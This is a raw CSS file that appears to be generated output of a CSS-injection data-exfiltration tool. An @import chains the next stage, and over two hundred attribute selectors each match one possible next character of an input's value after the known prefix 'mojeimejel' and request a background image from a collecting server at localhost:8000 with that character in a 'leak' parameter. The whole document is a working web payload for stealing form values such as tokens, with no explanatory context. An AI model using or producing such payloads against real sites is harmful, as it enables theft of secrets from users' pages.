@import url("http://localhost:8000/?l=12");
input[value="mojeimejel!"] {background: url("http://localhost:8000/?leak=!&q=0.31807061609620324");}
input[value="mojeimejel\""] {background: url("http://localhost:8000/?leak=\"&q=0.7735121680297441");}
input[value="mojeimejel#"] {background: url("http://localhost:8000/?leak=#&q=0.03351229249480436");}
input[value="mojeimejel$"] {background: url("http://localhost:8000/?leak=$&q=0.2512913948107294");}
input[value="mojeimejel%"] {background: url("http://localhost:8000/?leak=%&q=0.9673214855634047");}
input[value="mojeimejel&"] {background: url("http://localhost:8000/?leak=&&q=0.7867129992114745");}
input[value="mojeimejel'"] {background: url("http://localhost:8000/?leak='&q=0.769774073679802");}
input[value="mojeimejel("] {background: url("http://localhost:8000/?leak=(&q=0.26893725589622575");}
input[value="mojeimejel)"] {background: url("http://localhost:8000/?leak=)&q=0.1869625816518199");}
input[value="mojeimejel*"] {background: url("http://localhost:8000/?leak=*&q=0.2784650652678826");}
input[value="mojeimejel+"] {background: url("http://localhost:8000/?leak=+&q=0.2828927407576025");}
input[value="mojeimejel,"] {background: url("http://localhost:8000/?leak=,&q=0.7248773386978296");}
input[value="mojeimejel-"] {background: url("http://localhost:8000/?leak=-&q=0.7170226923512271");}
input[value="mojeimejel."] {background: url("http://localhost:8000/?leak=.&q=0.7524243303881599");}
input[value="mojeimejel/"] {background: url("http://localhost:8000/?leak=/&q=0.650508810654939");}
input[value="mojeimejel0"] {background: url("http://localhost:8000/?leak=0&q=0.4799211236987855");}
input[value="mojeimejel1"] {background: url("http://localhost:8000/?leak=1&q=0.7033313632045513");}
input[value="mojeimejel2"] {background: url("http://localhost:8000/?leak=2&q=0.9854495231835068");}
input[value="mojeimejel3"] {background: url("http://localhost:8000/?leak=3&q=0.32257986544234973");}
input[value="mojeimejel4"] {background: url("http://localhost:8000/?leak=4&q=0.5885052966241806");}
input[value="mojeimejel5"] {background: url("http://localhost:8000/?leak=5&q=0.4791538360938721");}
input[value="mojeimejel6"] {background: url("http://localhost:8000/?leak=6&q=0.24717529591981502");}
input[value="mojeimejel7"] {background: url("http://localhost:8000/?leak=7&q=0.9397585793553844");}
input[value="mojeimejel8"] {background: url("http://localhost:8000/?leak=8&q=0.5718903998660161");}
input[value="mojeimejel9"] {background: url("http://localhost:8000/?leak=9&q=0.331123403666421");}
input[value="mojeimejel:"] {background: url("http://localhost:8000/?leak=:&q=0.9795467013367141");}
input[value="mojeimejel;"] {background: url("http://localhost:8000/?leak=;&q=0.3554046546111087");}
input[value="mojeimejel<"] {background: url("http://localhost:8000/?leak=<&q=0.0846139852290877");}
input[value="mojeimejel="] {background: url("http://localhost:8000/?leak==&q=0.48531701875326916");}
input[value="mojeimejel>"] {background: url("http://localhost:8000/?leak=>&q=0.7270047410858289");}
input[value="mojeimejel?"] {background: url("http://localhost:8000/?leak=?&q=0.3917266255561018");}
input[value="mojeimejel@"] {background: url("http://localhost:8000/?leak=@&q=0.12977770441293734");}
input[value="mojeimejelA"] {background: url("http://localhost:8000/?leak=A&q=0.3043742724288183");}
input[value="mojeimejelB"] {background: url("http://localhost:8000/?leak=B&q=0.7638379246392895");}
input[value="mojeimejelC"] {background: url("http://localhost:8000/?leak=C&q=0.9009202360388218");}
input[value="mojeimejelD"] {background: url("http://localhost:8000/?leak=D&q=0.7563614386005992");}
input[value="mojeimejelE"] {background: url("http://localhost:8000/?leak=E&q=0.007258813995776103");}
input[value="mojeimejelF"] {background: url("http://localhost:8000/?leak=F&q=0.3351572702887451");}
input[value="mojeimejelG"] {background: url("http://localhost:8000/?leak=G&q=0.6483405921780074");}
input[value="mojeimejelH"] {background: url("http://localhost:8000/?leak=H&q=0.855643655220476");}
input[value="mojeimejelI"] {background: url("http://localhost:8000/?leak=I&q=0.2658144421291204");}
input[value="mojeimejelJ"] {background: url("http://localhost:8000/?leak=J&q=0.9852451613284308");}
input[value="mojeimejelK"] {background: url("http://localhost:8000/?leak=K&q=0.03542063551050534");}
input[value="mojeimejelL"] {background: url("http://localhost:8000/?leak=L&q=0.8267342190015077");}
input[value="mojeimejelM"] {background: url("http://localhost:8000/?leak=M&q=0.9852175912073391");}
input[value="mojeimejelN"] {background: url("http://localhost:8000/?leak=N&q=0.006479996118090803");}
input[value="mojeimejelO"] {background: url("http://localhost:8000/?leak=O&q=0.6197616333337006");}
input[value="mojeimejelP"] {background: url("http://localhost:8000/?leak=P&q=0.17579523458642443");}
input[value="mojeimejelQ"] {background: url("http://localhost:8000/?leak=Q&q=0.2608321384757437");}
input[value="mojeimejelR"] {background: url("http://localhost:8000/?leak=R&q=0.047853357757655646");}
input[value="mojeimejelS"] {background: url("http://localhost:8000/?leak=S&q=0.5555843430628307");}
input[value="mojeimejelT"] {background: url("http://localhost:8000/?leak=T&q=0.605782849673985");}
input[value="mojeimejelU"] {background: url("http://localhost:8000/?leak=U&q=0.36821671566515324");}
input[value="mojeimejelV"] {background: url("http://localhost:8000/?leak=V&q=0.331591301044867");}
input[value="mojeimejelW"] {background: url("http://localhost:8000/?leak=W&q=0.04895041664789446");}
input[value="mojeimejelX"] {background: url("http://localhost:8000/?leak=X&q=0.5910166646267168");}
input[value="mojeimejelY"] {background: url("http://localhost:8000/?leak=Y&q=0.9417742972659731");}
input[value="mojeimejelZ"] {background: url("http://localhost:8000/?leak=Z&q=0.9748391351654111");}
input[value="mojeimejel["] {background: url("http://localhost:8000/?leak=[&q=0.7918499979717464");}
input[value="mojeimejel\\"] {background: url("http://localhost:8000/?leak=\\&q=0.7142590442091363");}
input[value="mojeimejel]"] {background: url("http://localhost:8000/?leak=]&q=0.9114867388461891");}
input[value="mojeimejel^"] {background: url("http://localhost:8000/?leak=^&q=0.633766689143481");}
input[value="mojeimejel_"] {background: url("http://localhost:8000/?leak=_&q=0.07924465967479266");}
input[value="mojeimejel`"] {background: url("http://localhost:8000/?leak=`&q=0.013060533153358866");}
input[value="mojeimejela"] {background: url("http://localhost:8000/?leak=a&q=0.32222585965079964");}
input[value="mojeimejelb"] {background: url("http://localhost:8000/?leak=b&q=0.02567103086865541");}
input[value="mojeimejelc"] {background: url("http://localhost:8000/?leak=c&q=0.5250361062598536");}
input[value="mojeimejeld"] {background: url("http://localhost:8000/?leak=d&q=0.10465519106891485");}
input[value="mojeimejele"] {background: url("http://localhost:8000/?leak=e&q=0.36430462949602704");}
input[value="mojeimejelf"] {background: url("http://localhost:8000/?leak=f&q=0.7315972481228183");}
input[value="mojeimejelg"] {background: url("http://localhost:8000/?leak=g&q=0.4912460320827252");}
input[value="mojeimejelh"] {background: url("http://localhost:8000/?leak=h&q=0.8855072125666748");}
input[value="mojeimejeli"] {background: url("http://localhost:8000/?leak=i&q=0.08408645291569883");}
input[value="mojeimejelj"] {background: url("http://localhost:8000/?leak=j&q=0.02377233688424152");}
input[value="mojeimejelk"] {background: url("http://localhost:8000/?leak=k&q=0.8628299420589995");}
input[value="mojeimejell"] {background: url("http://localhost:8000/?leak=l&q=0.5020147169813476");}
input[value="mojeimejelm"] {background: url("http://localhost:8000/?leak=m&q=0.5686103154853548");}
input[value="mojeimejeln"] {background: url("http://localhost:8000/?leak=n&q=0.44423453466716945");}
input[value="mojeimejelo"] {background: url("http://localhost:8000/?leak=o&q=0.36344760724591074");}
input[value="mojeimejelp"] {background: url("http://localhost:8000/?leak=p&q=0.6916756912712188");}
input[value="mojeimejelq"] {background: url("http://localhost:8000/?leak=q&q=0.7665571523448678");}
input[value="mojeimejelr"] {background: url("http://localhost:8000/?leak=r&q=0.120973700998799");}
input[value="mojeimejels"] {background: url("http://localhost:8000/?leak=s&q=0.9414570547836909");}
input[value="mojeimejelt"] {background: url("http://localhost:8000/?leak=t&q=0.13453861389688782");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=u&q=0.961954566587716");}
input[value="mojeimejelv"] {background: url("http://localhost:8000/?leak=v&q=0.2802595458817829");}
input[value="mojeimejelw"] {background: url("http://localhost:8000/?leak=w&q=0.0812831565914498");}
input[value="mojeimejelx"] {background: url("http://localhost:8000/?leak=x&q=0.09560807403729088");}
input[value="mojeimejely"] {background: url("http://localhost:8000/?leak=y&q=0.1710749894962249");}
input[value="mojeimejelz"] {background: url("http://localhost:8000/?leak=z&q=0.9136182469422582");}
input[value="mojeimejel{"] {background: url("http://localhost:8000/?leak={&q=0.810980206949232");}
input[value="mojeimejel|"] {background: url("http://localhost:8000/?leak=|&q=0.9141023166483773");}
input[value="mojeimejel}"] {background: url("http://localhost:8000/?leak=}&q=0.5923898811121175");}
input[value="mojeimejel~"] {background: url("http://localhost:8000/?leak=~&q=0.8692248086565595");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.40653212425717866");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.13678933725486897");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.04275778573137656");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.6196405016464397");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.4939540401957949");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.2737797017148198");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.6249342689030191");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.9407744711059218");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.1374250934793988");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.1985145811631326");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.8485412950170861");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.5678872675358608");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.6975355136281916");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.37855139545759897");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.46234813867333924");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.6815473275163355");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.4149368116911647");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.5821040743822006");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.18772912428034583");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.45777549059654676");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.5713787767607814");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.3357538242038407");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.04033992030766398");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.439331202987858");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.03008337361011404");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.7400612724545372");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.52841897905303");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.8615385208206157");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.5806908919539273");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.3327242796840806");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.07946185213288848");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.14051278028121583");}
input[value="mojeimejel"] {background: url("http://localhost:8000/?leak=&q=0.7907131360975244");}
input[value="mojeimejel "] {background: url("http://localhost:8000/?leak= &q=0.8485916025434632");}
input[value="mojeimejel¡"] {background: url("http://localhost:8000/?leak=¡&q=0.2500570012356855");}
input[value="mojeimejel¢"] {background: url("http://localhost:8000/?leak=¢&q=0.26580662902798924");}
input[value="mojeimejel£"] {background: url("http://localhost:8000/?leak=£&q=0.322104490286633");}
input[value="mojeimejel¤"] {background: url("http://localhost:8000/?leak=¤&q=0.7152943322006873");}
input[value="mojeimejel¥"] {background: url("http://localhost:8000/?leak=¥&q=0.011912625571118829");}
input[value="mojeimejel¦"] {background: url("http://localhost:8000/?leak=¦&q=0.7778796545436164");}
input[value="mojeimejel§"] {background: url("http://localhost:8000/?leak=§&q=0.38393734407997915");}
input[value="mojeimejel¨"] {background: url("http://localhost:8000/?leak=¨&q=0.6184924848636308");}
input[value="mojeimejel©"] {background: url("http://localhost:8000/?leak=©&q=0.4811076245269639");}
input[value="mojeimejelª"] {background: url("http://localhost:8000/?leak=ª&q=0.6529596074297792");}
input[value="mojeimejel«"] {background: url("http://localhost:8000/?leak=«&q=0.6377970544052274");}
input[value="mojeimejel¬"] {background: url("http://localhost:8000/?leak=¬&q=0.20245870712369807");}
input[value="mojeimejel­"] {background: url("http://localhost:8000/?leak=­&q=0.8677691446723332");}
input[value="mojeimejel®"] {background: url("http://localhost:8000/?leak=®&q=0.3052225817576413");}
input[value="mojeimejel¯"] {background: url("http://localhost:8000/?leak=¯&q=0.5615760543259773");}
input[value="mojeimejel°"] {background: url("http://localhost:8000/?leak=°&q=0.7315173954485916");}
input[value="mojeimejel±"] {background: url("http://localhost:8000/?leak=±&q=0.5560898103245091");}
input[value="mojeimejel²"] {background: url("http://localhost:8000/?leak=²&q=0.7499876162099974");}
input[value="mojeimejel³"] {background: url("http://localhost:8000/?leak=³&q=0.4935978923692037");}
input[value="mojeimejel´"] {background: url("http://localhost:8000/?leak=´&q=0.4547555705830062");}
input[value="mojeimejelµ"] {background: url("http://localhost:8000/?leak=µ&q=0.8163982650864949");}
input[value="mojeimejel¶"] {background: url("http://localhost:8000/?leak=¶&q=0.44569647820363323");}
input[value="mojeimejel·"] {background: url("http://localhost:8000/?leak=·&q=0.9357187198904822");}
input[value="mojeimejel¸"] {background: url("http://localhost:8000/?leak=¸&q=0.7442882944029525");}
input[value="mojeimejel¹"] {background: url("http://localhost:8000/?leak=¹&q=0.8782378379116662");}
input[value="mojeimejelº"] {background: url("http://localhost:8000/?leak=º&q=0.8658371897658257");}
input[value="mojeimejel»"] {background: url("http://localhost:8000/?leak=»&q=0.6200720847222128");}
input[value="mojeimejel¼"] {background: url("http://localhost:8000/?leak=¼&q=0.9767479655395128");}
input[value="mojeimejel½"] {background: url("http://localhost:8000/?leak=½&q=0.055285958482052644");}
input[value="mojeimejel¾"] {background: url("http://localhost:8000/?leak=¾&q=0.4565871206492027");}
input[value="mojeimejel¿"] {background: url("http://localhost:8000/?leak=¿&q=0.5081782289885748");}
input[value="mojeimejelÀ"] {background: url("http://localhost:8000/?leak=À&q=0.13275240610746408");}
input[value="mojeimejelÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.8932799343759852");}
input[value="mojeimejelÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.16041999006621133");}
input[value="mojeimejelÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.7356070921353082");}
input[value="mojeimejelÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.835782787004439");}
input[value="mojeimejelÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.3797615516402142");}
input[value="mojeimejelÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.3545482980569985");}
input[value="mojeimejelÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.015915985521345988");}
input[value="mojeimejelÈ"] {background: url("http://localhost:8000/?leak=È&q=0.21330755288143144");}
input[value="mojeimejelÉ"] {background: url("http://localhost:8000/?leak=É&q=0.8440073031869706");}
input[value="mojeimejelÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.07922833808115026");}
input[value="mojeimejelË"] {background: url("http://localhost:8000/?leak=Ë&q=0.23672759565033563");}
input[value="mojeimejelÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.476166628027767");}
input[value="mojeimejelÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.6040710954794404");}
input[value="mojeimejelÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.3457905929597376");}
input[value="mojeimejelÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.5853482303367021");}
input[value="mojeimejelÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.5049273644027619");}
input[value="mojeimejelÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.9606044247096155");}
input[value="mojeimejelÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.16180697337725847");}
input[value="mojeimejelÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.8494677385747256");}
input[value="mojeimejelÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.43224456735258543");}
input[value="mojeimejelÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.7935026567998309");}
input[value="mojeimejelÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.20270825462441788");}
input[value="mojeimejel×"] {background: url("http://localhost:8000/?leak=×&q=0.7850719244108977");}
input[value="mojeimejelØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.49622637021347193");}
input[value="mojeimejelÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.8472732139816632");}
input[value="mojeimejelÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.29121507151914816");}
input[value="mojeimejelÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.0009035557998284816");}
input[value="mojeimejelÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.23493354976782488");}
input[value="mojeimejelÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.15618635042606743");}
input[value="mojeimejelÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.7766242171278956");}
input[value="mojeimejelß"] {background: url("http://localhost:8000/?leak=ß&q=0.5001464348441902");}
input[value="mojeimejelà"] {background: url("http://localhost:8000/?leak=à&q=0.42787388212692146");}
input[value="mojeimejelá"] {background: url("http://localhost:8000/?leak=á&q=0.9943435234651365");}
input[value="mojeimejelâ"] {background: url("http://localhost:8000/?leak=â&q=0.9972807804077588");}
input[value="mojeimejelã"] {background: url("http://localhost:8000/?leak=ã&q=0.567957446357495");}
input[value="mojeimejelä"] {background: url("http://localhost:8000/?leak=ä&q=0.43856274660542893");}
input[value="mojeimejelå"] {background: url("http://localhost:8000/?leak=å&q=0.3291583711142727");}
input[value="mojeimejelæ"] {background: url("http://localhost:8000/?leak=æ&q=0.3125200812487481");}
input[value="mojeimejelç"] {background: url("http://localhost:8000/?leak=ç&q=0.5609678124372073");}
input[value="mojeimejelè"] {background: url("http://localhost:8000/?leak=è&q=0.34668256689893995");}
input[value="mojeimejelé"] {background: url("http://localhost:8000/?leak=é&q=0.9776386989117543");}
input[value="mojeimejelê"] {background: url("http://localhost:8000/?leak=ê&q=0.8788804711838358");}
input[value="mojeimejelë"] {background: url("http://localhost:8000/?leak=ë&q=0.7157781932155469");}
input[value="mojeimejelì"] {background: url("http://localhost:8000/?leak=ì&q=0.588885216670973");}
input[value="mojeimejelí"] {background: url("http://localhost:8000/?leak=í&q=0.7150479966686105");}
input[value="mojeimejelî"] {background: url("http://localhost:8000/?leak=î&q=0.4240163935383938");}
input[value="mojeimejelï"] {background: url("http://localhost:8000/?leak=ï&q=0.9735598221881561");}
input[value="mojeimejelð"] {background: url("http://localhost:8000/?leak=ð&q=0.05241161453152432");}
input[value="mojeimejelñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.7085887443650476");}
input[value="mojeimejelò"] {background: url("http://localhost:8000/?leak=ò&q=0.8297839551224762");}
input[value="mojeimejeló"] {background: url("http://localhost:8000/?leak=ó&q=0.9632711826254801");}
input[value="mojeimejelô"] {background: url("http://localhost:8000/?leak=ô&q=0.4058250962048737");}
input[value="mojeimejelõ"] {background: url("http://localhost:8000/?leak=õ&q=0.8577776432755286");}
input[value="mojeimejelö"] {background: url("http://localhost:8000/?leak=ö&q=0.7560098406756548");}
input[value="mojeimejel÷"] {background: url("http://localhost:8000/?leak=÷&q=0.7820519973439048");}
input[value="mojeimejelø"] {background: url("http://localhost:8000/?leak=ø&q=0.7427837505382322");}
input[value="mojeimejelù"] {background: url("http://localhost:8000/?leak=ù&q=0.8016162677856775");}
input[value="mojeimejelú"] {background: url("http://localhost:8000/?leak=ú&q=0.6310804241171757");}
input[value="mojeimejelû"] {background: url("http://localhost:8000/?leak=û&q=0.12471242868303589");}
input[value="mojeimejelü"] {background: url("http://localhost:8000/?leak=ü&q=0.3547536582755144");}
input[value="mojeimejelý"] {background: url("http://localhost:8000/?leak=ý&q=0.4958850444367533");}
input[value="mojeimejelþ"] {background: url("http://localhost:8000/?leak=þ&q=0.19964038526232497");}
input[value="mojeimejelÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.1461405181282538");}
